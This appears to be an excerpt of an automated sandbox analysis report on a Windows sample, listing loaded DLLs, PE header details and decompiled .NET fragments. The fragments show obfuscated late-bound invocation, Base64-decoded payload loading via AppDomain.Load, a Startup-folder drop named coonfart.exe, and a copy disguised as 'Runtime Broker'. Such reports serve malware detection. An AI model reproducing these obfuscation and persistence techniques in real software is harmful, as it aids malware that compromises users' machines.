                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: Runtime Broker.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\Public\Runtime Broker
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: 80BvHOM51j.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: 80BvHOM51j.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: 80BvHOM51j.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: 80BvHOM51j.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: 80BvHOM51j.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: 80BvHOM51j.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: 80BvHOM51j.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: 80BvHOM51j.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: coonfart.exe.0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{MvsynE2XwtVDEliLiQwo3c.TVBYUTCFMMOmxgnOyqmBv5,MvsynE2XwtVDEliLiQwo3c.eF8iYh2vx0ySqP3e4Rz4GR,MvsynE2XwtVDEliLiQwo3c.UXu7gqD7EluNDgbta7nqUQ,MvsynE2XwtVDEliLiQwo3c.QdfabbDTQZP0MO21yQpgep,v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.qR7AlO8hcwXAL7sginxHouPIVF4Mq8yppIeC97TU()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: coonfart.exe.0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KqmPyQVpdHN4TGPIlL9Khy[2],v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.yAb1ZznffDhKXG0cLfTx0kk2JD3CQFAlZva5NIEv(Convert.FromBase64String(KqmPyQVpdHN4TGPIlL9Khy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: coonfart.exe.0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { KqmPyQVpdHN4TGPIlL9Khy[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{MvsynE2XwtVDEliLiQwo3c.TVBYUTCFMMOmxgnOyqmBv5,MvsynE2XwtVDEliLiQwo3c.eF8iYh2vx0ySqP3e4Rz4GR,MvsynE2XwtVDEliLiQwo3c.UXu7gqD7EluNDgbta7nqUQ,MvsynE2XwtVDEliLiQwo3c.QdfabbDTQZP0MO21yQpgep,v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.qR7AlO8hcwXAL7sginxHouPIVF4Mq8yppIeC97TU()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KqmPyQVpdHN4TGPIlL9Khy[2],v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.yAb1ZznffDhKXG0cLfTx0kk2JD3CQFAlZva5NIEv(Convert.FromBase64String(KqmPyQVpdHN4TGPIlL9Khy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { KqmPyQVpdHN4TGPIlL9Khy[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{MvsynE2XwtVDEliLiQwo3c.TVBYUTCFMMOmxgnOyqmBv5,MvsynE2XwtVDEliLiQwo3c.eF8iYh2vx0ySqP3e4Rz4GR,MvsynE2XwtVDEliLiQwo3c.UXu7gqD7EluNDgbta7nqUQ,MvsynE2XwtVDEliLiQwo3c.QdfabbDTQZP0MO21yQpgep,v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.qR7AlO8hcwXAL7sginxHouPIVF4Mq8yppIeC97TU()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KqmPyQVpdHN4TGPIlL9Khy[2],v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.yAb1ZznffDhKXG0cLfTx0kk2JD3CQFAlZva5NIEv(Convert.FromBase64String(KqmPyQVpdHN4TGPIlL9Khy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { KqmPyQVpdHN4TGPIlL9Khy[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{MvsynE2XwtVDEliLiQwo3c.TVBYUTCFMMOmxgnOyqmBv5,MvsynE2XwtVDEliLiQwo3c.eF8iYh2vx0ySqP3e4Rz4GR,MvsynE2XwtVDEliLiQwo3c.UXu7gqD7EluNDgbta7nqUQ,MvsynE2XwtVDEliLiQwo3c.QdfabbDTQZP0MO21yQpgep,v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.qR7AlO8hcwXAL7sginxHouPIVF4Mq8yppIeC97TU()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KqmPyQVpdHN4TGPIlL9Khy[2],v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.yAb1ZznffDhKXG0cLfTx0kk2JD3CQFAlZva5NIEv(Convert.FromBase64String(KqmPyQVpdHN4TGPIlL9Khy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { KqmPyQVpdHN4TGPIlL9Khy[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{MvsynE2XwtVDEliLiQwo3c.TVBYUTCFMMOmxgnOyqmBv5,MvsynE2XwtVDEliLiQwo3c.eF8iYh2vx0ySqP3e4Rz4GR,MvsynE2XwtVDEliLiQwo3c.UXu7gqD7EluNDgbta7nqUQ,MvsynE2XwtVDEliLiQwo3c.QdfabbDTQZP0MO21yQpgep,v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.qR7AlO8hcwXAL7sginxHouPIVF4Mq8yppIeC97TU()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KqmPyQVpdHN4TGPIlL9Khy[2],v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.yAb1ZznffDhKXG0cLfTx0kk2JD3CQFAlZva5NIEv(Convert.FromBase64String(KqmPyQVpdHN4TGPIlL9Khy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { KqmPyQVpdHN4TGPIlL9Khy[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{MvsynE2XwtVDEliLiQwo3c.TVBYUTCFMMOmxgnOyqmBv5,MvsynE2XwtVDEliLiQwo3c.eF8iYh2vx0ySqP3e4Rz4GR,MvsynE2XwtVDEliLiQwo3c.UXu7gqD7EluNDgbta7nqUQ,MvsynE2XwtVDEliLiQwo3c.QdfabbDTQZP0MO21yQpgep,v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.qR7AlO8hcwXAL7sginxHouPIVF4Mq8yppIeC97TU()}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{KqmPyQVpdHN4TGPIlL9Khy[2],v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.yAb1ZznffDhKXG0cLfTx0kk2JD3CQFAlZva5NIEv(Convert.FromBase64String(KqmPyQVpdHN4TGPIlL9Khy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { KqmPyQVpdHN4TGPIlL9Khy[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                        .NET source code contains potential unpacker
                        Source: coonfart.exe.0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: nJ7ntGzX47CKonow5A0vgp System.AppDomain.Load(byte[])
                        Source: coonfart.exe.0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp System.AppDomain.Load(byte[])
                        Source: coonfart.exe.0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: nJ7ntGzX47CKonow5A0vgp System.AppDomain.Load(byte[])
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp System.AppDomain.Load(byte[])
                        Source: 45b52685-cc32-47e5-abd7-306bfc875622[1].0.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: nJ7ntGzX47CKonow5A0vgp System.AppDomain.Load(byte[])
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp System.AppDomain.Load(byte[])
                        Source: 0.3.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: nJ7ntGzX47CKonow5A0vgp System.AppDomain.Load(byte[])
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp System.AppDomain.Load(byte[])
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: nJ7ntGzX47CKonow5A0vgp System.AppDomain.Load(byte[])
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp System.AppDomain.Load(byte[])
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: nJ7ntGzX47CKonow5A0vgp System.AppDomain.Load(byte[])
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp System.AppDomain.Load(byte[])
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.cs.Net Code: f0L1ZQ6yGxVajY0UWNFGbp
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 2_2_00007FFD9BAA00BD pushad ; iretd 2_2_00007FFD9BAA00C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B9AD2A5 pushad ; iretd 6_2_00007FFD9B9AD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9BAC271C pushad ; retf 6_2_00007FFD9BAC2749
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9BAC26EC push eax; retf 6_2_00007FFD9BAC2719
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9BAC2644 push cs; retf 6_2_00007FFD9BAC26A2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9BAC2634 push cs; retf 6_2_00007FFD9BAC26A2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9BAC3544 pushfd ; retf 6_2_00007FFD9BAC3552
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9BB92316 push 8B485F92h; iretd 6_2_00007FFD9BB9231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9B9BD2A5 pushad ; iretd 12_2_00007FFD9B9BD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9BAD2B95 push cs; retf 12_2_00007FFD9BAD2BBA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9BADC2C5 push ebx; iretd 12_2_00007FFD9BADC2DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD9BBA2316 push 8B485F91h; iretd 12_2_00007FFD9BBA231B
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeCode function: 16_2_00007FFD9BAA00BD pushad ; iretd 16_2_00007FFD9BAA00C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B9BD2A5 pushad ; iretd 17_2_00007FFD9B9BD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9BBA2316 push 8B485F91h; iretd 17_2_00007FFD9BBA231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD9B9AD2A5 pushad ; iretd 19_2_00007FFD9B9AD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD9BB92316 push 8B485F92h; iretd 19_2_00007FFD9BB9231B
                        Source: C:\Users\Public\Runtime BrokerCode function: 23_2_00007FFD9BAD00BD pushad ; iretd 23_2_00007FFD9BAD00C1
                        Source: coonfart.exe.0.dr, akkQj1sqFfSSBzoPzzcJHWUTImoPHvJQ5obC9Mw1.csHigh entropy of concatenated method names: 'pAJejPeYzjpeABmxWAkwbiTw1mqxCBmWmzTSrx83', '_87FcV7zG86E30YrE8gQLgID0Pl0Rr8rZkIxWtvsL', 'v3sUlDIQcXFjjp98fRg32WcEry4fbZasOGIybWnP', '_84epM09kzCj1ocmmfMHdDDJHEGRKiElEqqmhabpMi6LzJY6cDBf2Vbkr6y', 'zSua969pyTVqty23ApV0ANHgAW7QrIlnwrBgTIVyrLUw8dJssslp6p58Ip', 'FnKRcw4KPNme0yZtl5FELK4OdN5xLbjT4cXFE4pfT1hFgAfHDJiRgSzpze', 'pc6HzlGBo11QPwPRRFQ6QRxbYEtDamkRqvINDP0CDIsZilUCHP6In3fFyu', '_82lVQ2aRHE9MNikTPEUcVF5nnzk8A7t3NtGHH2Nf0ii0pbq8qjriMOP8Lc', 'M297JKFH2OaGT0qMJHXjz69qKR52Hx7lNLBlEbEdrsfaB58kZw6qofBuHF', 'wlTS5WXqG2faQnePm2hvP6ctocY7uCb3JbkGwtH52XHtazaW4XP0FdlC0L'
                        Source: coonfart.exe.0.dr, MvsynE2XwtVDEliLiQwo3c.csHigh entropy of concatenated method names: 'ueNuYTmXQ6K8bfOElL57OU0hCnclTgziBvANqcTK', 'CBchHZE3WXHDMIFIqc5B43k2dzUvj6Crf6lCXYmY', 'arDnoot9r0xRAqgQNBWzZpMYSPsK0BYlt3OLGZav', 'y1Mq1pDHA1XXZwh82mGxkp5en9MUWuAwUltF827V'
                        Source: coonfart.exe.0.dr, Os6S553ieUGpaR9GelWERs.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xishLqBUDDHpndP3Olfre38kEdoMck7seFJ9DibN', 'VR1rAbrBcGLrzpyEucWvGZChYhBDvpfhYfawlIUD', '_5XqXp0gqv8hTSag2ajjAvaGP10dcEs9cMBc4zc14', 'sVRWWQMYpJATbzfdzYcUeieHPwx1YqtvldaTNZ1S'
                        Source: coonfart.exe.0.dr, 0GxKZuckCqDxUPkmOCW34U.csHigh entropy of concatenated method names: 'Bmmzjl1eEbAyvOphJ3NWd7', 'SLK2lnpJa9DqMcztIV7Z6j', '_22uK1rjvw8vloqfU5w5X1X', 'HGPRHHTrnxEJWFsE9csHF5', 'juIdeSwIMWFfiPQ4drAnun', 'x76vGPuzOxXExP3IjzRh70', 'oXrEMZEoYSSPQxUVd7T9f4', 'YAhT9MPl1SE2dXfuYVR2ky', '_3aN0qCK0cpEAsjD3NIfE6B', 'Ls06vQidZK1lwZ26PYDiWby9PIdinAxtZ5Xn3vyvhMsdo0JEs1NbBDIIpnMUVhviMfm9Ja8qGnggbdS6bsYIdp80SjTToFasH7'
